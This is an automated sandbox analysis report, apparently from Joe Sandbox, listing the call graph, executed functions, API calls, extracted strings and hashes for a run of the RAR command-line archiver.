7ff71d316d4c 6 API calls __vcrt_uninitialize_ptd 39765->39783 39772 7ff71d314a74 __free_lconv_mon 15 API calls 39766->39772 39769 7ff71d3156a0 SetLastError 39767->39769 39770 7ff71d3156b6 SetLastError 39767->39770 39769->39757 39785 7ff71d314a1c 35 API calls abort 39770->39785 39775 7ff71d315678 39772->39775 39773 7ff71d315688 39773->39766 39776 7ff71d31568f 39773->39776 39775->39770 39784 7ff71d3153e0 15 API calls _invalid_parameter_noinfo 39776->39784 39778 7ff71d315694 39779 7ff71d314a74 __free_lconv_mon 15 API calls 39778->39779 39779->39767 39781->39761 39782->39765 39783->39773 39784->39778 39786 7ff71d319c74 39787 7ff71d319c7c 39786->39787 39788 7ff71d319cbb 39787->39788 39789 7ff71d319cac 39787->39789 39790 7ff71d319cc5 39788->39790 39808 7ff71d31ce08 32 API calls 2 library calls 39788->39808 39807 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39789->39807 39795 7ff71d314b8c 39790->39795 39794 7ff71d319cb1 __scrt_fastfail 39796 7ff71d314bab 39795->39796 39797 7ff71d314ba1 39795->39797 39798 7ff71d314bb0 39796->39798 39805 7ff71d314bb7 __vcrt_getptd_noexit 39796->39805 39799 7ff71d314ab4 setbuf 16 API calls 39797->39799 39800 7ff71d314a74 __free_lconv_mon 15 API calls 39798->39800 39803 7ff71d314ba9 39799->39803 39800->39803 39801 7ff71d314bf6 39809 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39801->39809 39803->39794 39804 7ff71d314be0 RtlReAllocateHeap 39804->39803 39804->39805 39805->39801 39805->39804 39806 7ff71d3136c0 new 2 API calls 39805->39806 39806->39805 39807->39794 39808->39790 39809->39803 39810 7ff71d2b7a5b 39811 7ff71d2b7a60 39810->39811 39812 7ff71d2c9be0 14 API calls 39811->39812 39814 7ff71d2b7af7 39811->39814 39812->39814 39813 7ff71d2b7bda 39816 7ff71d2bb540 147 API calls 39813->39816 39814->39813 39843 7ff71d2d1e1c GetFileTime 39814->39843 39817 7ff71d2b7bf8 39816->39817 39820 7ff71d2b7c3e 39817->39820 39844 7ff71d309b98 216 API calls 3 library calls 39817->39844 39819 7ff71d2bb540 147 API calls 39821 7ff71d2b7c9c 39819->39821 39820->39819 39842 7ff71d2b7f89 39821->39842 39845 7ff71d2d6378 39821->39845 39823 7ff71d2b7cd7 39824 7ff71d2d6378 4 API calls 39823->39824 39826 7ff71d2b7cf3 39824->39826 39825 7ff71d2b7e4e 39856 7ff71d2b1204 48 API calls 39825->39856 39828 7ff71d2b7d59 39826->39828 39829 7ff71d2b7d38 39826->39829 39840 7ff71d2b7de1 39826->39840 39830 7ff71d30a444 new 4 API calls 39828->39830 39831 7ff71d30a444 new 4 API calls 39829->39831 39835 7ff71d2b7d42 std::bad_alloc::bad_alloc 39830->39835 39831->39835 39833 7ff71d2b7eb3 39836 7ff71d2b7edb 39833->39836 39857 7ff71d2e9680 39833->39857 39835->39840 39849 7ff71d30ba34 RtlPcToFileHeader RaiseException 39835->39849 39863 7ff71d2d6424 8 API calls _handle_error 39836->39863 39839 7ff71d2b7f56 39841 7ff71d2bb540 147 API calls 39839->39841 39840->39825 39850 7ff71d2e98dc 39840->39850 39841->39842 39843->39813 39844->39820 39846 7ff71d2d6396 39845->39846 39848 7ff71d2d63a0 39845->39848 39847 7ff71d30a444 new 4 API calls 39846->39847 39847->39848 39848->39823 39849->39840 39851 7ff71d2e9926 39850->39851 39852 7ff71d2e993c 39850->39852 39854 7ff71d2c90b8 75 API calls 39851->39854 39853 7ff71d2c90b8 75 API calls 39852->39853 39855 7ff71d2e9934 39853->39855 39854->39855 39855->39825 39856->39833 39861 7ff71d2e96a4 39857->39861 39858 7ff71d2e97d7 39859 7ff71d2d2574 126 API calls 39859->39861 39861->39858 39861->39859 39862 7ff71d309b98 216 API calls 39861->39862 39864 7ff71d2d6498 72 API calls new 39861->39864 39862->39861 39863->39839 39864->39861

                                                            Executed Functions

                                                            Function 00007FF71D2C54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                            • API String ID: 0-1628410872
                                                            • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                            • Instruction ID: ec20bcf4e63f26e22b1655b69dd3441846af403096a98eb0ab2caa77f73b0000
                                                            • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                            • Instruction Fuzzy Hash: D9C2D43292C98281EA34BB2481442BDB691AF057B5FD84535CA2E472E5FE6DFD4CCB70
                                                            Function 00007FF71D2B1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                            • API String ID: 0-1660254149
                                                            • Opcode ID: eefc6d35d2847cea84a00b3f56c99ccad538a181ac11d2ce23a6cc3b2c6d100e
                                                            • Instruction ID: 137886874a5a7ae508126f286a65984c19f8d22f35b54bcdcb8d7b1933d33440
                                                            • Opcode Fuzzy Hash: eefc6d35d2847cea84a00b3f56c99ccad538a181ac11d2ce23a6cc3b2c6d100e
                                                            • Instruction Fuzzy Hash: 6FE2C422A0CFC285EB20EF25C4801FDA7A1FB497A8F954135CA6D07796EF79D648CB10
                                                            Function 00007FF71D2F48CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$FileFreeModuleNameVersion
                                                            • String ID: rarlng.dll
                                                            • API String ID: 2520153904-1675521814
                                                            • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                            • Instruction ID: ac9aa15f36a4bfd6214fca2125c213b331d12d8e225002cbf635e0cc702a9570
                                                            • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                            • Instruction Fuzzy Hash: AA314F31A1CE42C5FB64AB21E8412E9E364BB45798FC04439E94D42698EF7CE54ECF20
                                                            Function 00007FF71D2D46EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D4736
                                                            • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D476B
                                                            • GetLastError.KERNEL32(?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D477A
                                                            • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D47A4
                                                            • GetLastError.KERNEL32(?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D47B2
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                            • String ID:
                                                            • API String ID: 869497890-0
                                                            • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                            • Instruction ID: 11b5f8b9680931d99c1a199569432fc2162506277beea7a3961d24916572c213
                                                            • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                            • Instruction Fuzzy Hash: 8D419532B0CE8196EA24AB25E5502E9E360FB497B4F804335EA7D437C5EF6CE55D8B10
                                                            Function 00007FF71D2C901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                            • String ID:
                                                            • API String ID: 1815803762-0
                                                            • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                            • Instruction ID: fd2a8ec96b9e37f5ec4a6298539087035805678ee7f359b4486d0e1598747259
                                                            • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                            • Instruction Fuzzy Hash: 15016226B1CA5082F7009B16A444329E762EBC4FE0F598035DE4D43B64EF7DD94ACB14
                                                            Function 00007FF71D2BB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Char
                                                            • String ID:
                                                            • API String ID: 751630497-0
                                                            • Opcode ID: 30cca9b820c2462ea9223497f218cfc72479732bc9d6405a30229187a307cc14
                                                            • Instruction ID: c3cf76b18d91b8850b180db0d41aec7d277e4769e8464b3cb4595ca3fc3cf271
                                                            • Opcode Fuzzy Hash: 30cca9b820c2462ea9223497f218cfc72479732bc9d6405a30229187a307cc14
                                                            • Instruction Fuzzy Hash: E622D832A0CA8295E724EF30D4401FEF7A0FB54768F844135DA9D57199EEBCEA49CB60
                                                            Function 00007FF71D2DAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c6948624827ea7693b6108848687628fcd6e9d0da3fa2eb8db9aa223bd97b69
                                                            • Instruction ID: 4e4880b43fc9ff3da98da0375a0c68892b0ebbc6a9183386900c49b721bd4be0
                                                            • Opcode Fuzzy Hash: 9c6948624827ea7693b6108848687628fcd6e9d0da3fa2eb8db9aa223bd97b69
                                                            • Instruction Fuzzy Hash: 0571FA32A09E8586D704EF25E4153EDB391F788FA4F444139DB6D8B395EF78D0468B60
                                                            Function 00007FF71D2F3EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 635 7ff71d2f3ea8-7ff71d2f3f03 call 7ff71d30a5a0 call 7ff71d30c8a0 640 7ff71d2f3f05-7ff71d2f3f3e GetModuleFileNameW call 7ff71d2e4e14 call 7ff71d2fa9c0 635->640 641 7ff71d2f3f40-7ff71d2f3f50 call 7ff71d2fa9e8 635->641 645 7ff71d2f3f55-7ff71d2f3f79 call 7ff71d2d1874 call 7ff71d2d1e80 640->645 641->645 652 7ff71d2f4692-7ff71d2f46c5 call 7ff71d2d18ac call 7ff71d30a610 645->652 653 7ff71d2f3f7f-7ff71d2f3f89 645->653 654 7ff71d2f3fae-7ff71d2f3feb call 7ff71d30ec70 * 2 653->654 655 7ff71d2f3f8b-7ff71d2f3fac call 7ff71d2f11c0 * 2 653->655 668 7ff71d2f3fef-7ff71d2f3ff3 654->668 655->654 669 7ff71d2f40f2-7ff71d2f4112 call 7ff71d2d22e0 call 7ff71d30eb90 668->669 670 7ff71d2f3ff9-7ff71d2f402d call 7ff71d2d2440 call 7ff71d2d2150 668->670 669->652 681 7ff71d2f4118-7ff71d2f4131 call 7ff71d2d2150 669->681 679 7ff71d2f4033 670->679 680 7ff71d2f40bc-7ff71d2f40e2 call 7ff71d2d22e0 670->680 682 7ff71d2f403a-7ff71d2f403e 679->682 680->668 692 7ff71d2f40e8-7ff71d2f40ec 680->692 689 7ff71d2f4133-7ff71d2f4136 681->689 690 7ff71d2f4138-7ff71d2f414b call 7ff71d30eb90 681->690 685 7ff71d2f4064-7ff71d2f4069 682->685 686 7ff71d2f4040-7ff71d2f4044 682->686 693 7ff71d2f406b-7ff71d2f4070 685->693 694 7ff71d2f4097-7ff71d2f409f 685->694 686->685 691 7ff71d2f4046-7ff71d2f405e call 7ff71d312290 686->691 697 7ff71d2f416f-7ff71d2f41b1 call 7ff71d2fa900 call 7ff71d30eb90 689->697 690->652 706 7ff71d2f4151-7ff71d2f416c call 7ff71d2fd54c call 7ff71d30eb88 690->706 707 7ff71d2f40a3-7ff71d2f40a7 691->707 708 7ff71d2f4060 691->708 692->652 692->669 693->694 700 7ff71d2f4072-7ff71d2f4078 693->700 695 7ff71d2f40a1 694->695 696 7ff71d2f40b7 694->696 695->682 696->680 718 7ff71d2f41b3-7ff71d2f41bb call 7ff71d30eb88 697->718 719 7ff71d2f41c0-7ff71d2f41d5 697->719 704 7ff71d2f4093 700->704 705 7ff71d2f407a-7ff71d2f4091 call 7ff71d311700 700->705 704->694 705->704 716 7ff71d2f40a9-7ff71d2f40b5 705->716 706->697 707->696 708->685 716->680 718->652 720 7ff71d2f45f0-7ff71d2f4624 call 7ff71d2f3884 call 7ff71d30eb88 * 2 719->720 721 7ff71d2f41db 719->721 755 7ff71d2f4626-7ff71d2f4648 call 7ff71d2f11c0 * 2 720->755 756 7ff71d2f464a-7ff71d2f4691 call 7ff71d30ec70 * 2 720->756 725 7ff71d2f41e1-7ff71d2f41ee 721->725 727 7ff71d2f41f4-7ff71d2f41fa 725->727 728 7ff71d2f4508-7ff71d2f4513 725->728 731 7ff71d2f41fc-7ff71d2f4202 727->731 732 7ff71d2f4208-7ff71d2f420e 727->732 728->720 730 7ff71d2f4519-7ff71d2f4523 728->730 735 7ff71d2f4585-7ff71d2f4589 730->735 736 7ff71d2f4525-7ff71d2f452b 730->736 731->728 731->732 737 7ff71d2f4214-7ff71d2f425c 732->737 738 7ff71d2f43d0-7ff71d2f43e0 call 7ff71d2fa580 732->738 739 7ff71d2f45a3-7ff71d2f45d4 call 7ff71d2f3884 735->739 740 7ff71d2f458b-7ff71d2f458f 735->740 742 7ff71d2f4531-7ff71d2f4539 736->742 743 7ff71d2f45db-7ff71d2f45de 736->743 744 7ff71d2f4261-7ff71d2f4264 737->744 761 7ff71d2f43e6-7ff71d2f4414 call 7ff71d2fa9e8 call 7ff71d31172c 738->761 762 7ff71d2f44f0-7ff71d2f4503 738->762 739->743 740->739 746 7ff71d2f4591-7ff71d2f4597 740->746 749 7ff71d2f4573-7ff71d2f457a 742->749 750 7ff71d2f453b-7ff71d2f453e 742->750 743->720 751 7ff71d2f45e0-7ff71d2f45e5 743->751 752 7ff71d2f4268-7ff71d2f4270 744->752 746->743 754 7ff71d2f4599-7ff71d2f45a1 746->754 763 7ff71d2f457e-7ff71d2f4583 749->763 758 7ff71d2f4540-7ff71d2f4543 750->758 759 7ff71d2f456a-7ff71d2f4571 750->759 751->725 752->752 760 7ff71d2f4272-7ff71d2f4288 call 7ff71d311700 752->760 754->743 755->756 756->652 765 7ff71d2f4545-7ff71d2f4548 758->765 766 7ff71d2f4561-7ff71d2f4568 758->766 759->763 779 7ff71d2f42a3 760->779 780 7ff71d2f428a-7ff71d2f4295 760->780 761->762 787 7ff71d2f441a-7ff71d2f44a9 call 7ff71d2fd840 call 7ff71d2fa900 call 7ff71d2fa8c4 call 7ff71d2fa900 call 7ff71d3115fc 761->787 762->728 763->743 771 7ff71d2f454a-7ff71d2f454d 765->771 772 7ff71d2f4558-7ff71d2f455f 765->772 766->763 771->746 777 7ff71d2f454f-7ff71d2f4556 771->777 772->763 777->763 782 7ff71d2f42a7-7ff71d2f42be 779->782 780->779 785 7ff71d2f4297-7ff71d2f42a1 780->785 782->744 788 7ff71d2f42c0-7ff71d2f42c2 782->788 785->782 823 7ff71d2f44bf-7ff71d2f44cf 787->823 824 7ff71d2f44ab-7ff71d2f44bb 787->824 790 7ff71d2f42e6 788->790 791 7ff71d2f42c4-7ff71d2f42d6 call 7ff71d2fa900 788->791 790->738 794 7ff71d2f42ec 790->794 796 7ff71d2f42db-7ff71d2f42e1 791->796 797 7ff71d2f42f1-7ff71d2f42f7 794->797 799 7ff71d2f45d6 796->799 800 7ff71d2f4300-7ff71d2f4303 797->800 801 7ff71d2f42f9-7ff71d2f42fe 797->801 799->743 800->797 801->800 803 7ff71d2f4305-7ff71d2f4314 801->803 805 7ff71d2f4316-7ff71d2f4320 803->805 806 7ff71d2f433d-7ff71d2f4347 803->806 808 7ff71d2f4323-7ff71d2f4327 805->808 809 7ff71d2f434d-7ff71d2f4378 call 7ff71d2fd840 806->809 810 7ff71d2f45ea-7ff71d2f45ef call 7ff71d30a774 806->810 808->806 814 7ff71d2f4329-7ff71d2f433b 808->814 818 7ff71d2f439e-7ff71d2f43cb call 7ff71d2f470c 809->818 819 7ff71d2f437a-7ff71d2f4399 call 7ff71d311764 809->819 810->720 814->806 814->808 818->796 819->796 827 7ff71d2f44d2-7ff71d2f44d8 823->827 824->823 828 7ff71d2f44eb-7ff71d2f44ee 827->828 829 7ff71d2f44da-7ff71d2f44e5 827->829 828->827 829->799 829->828
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamesnprintfwcschr
                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                            • API String ID: 602362809-1645646101
                                                            • Opcode ID: c62561639fbdbdbf005c733f8e10f84305a44d785986a0b6db6af70807fe4adc
                                                            • Instruction ID: 8dd8a233a778f61bbedf53e07c23b4a3654407c4d0a4de1c0ee33e786d407f64
                                                            • Opcode Fuzzy Hash: c62561639fbdbdbf005c733f8e10f84305a44d785986a0b6db6af70807fe4adc
                                                            • Instruction Fuzzy Hash: 1422B132A1CE8284EB20BB15D4502F9A361FF547A4FC04535EA6E476D5FF6CE54ACB20
                                                            Function 00007FF71D2C4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
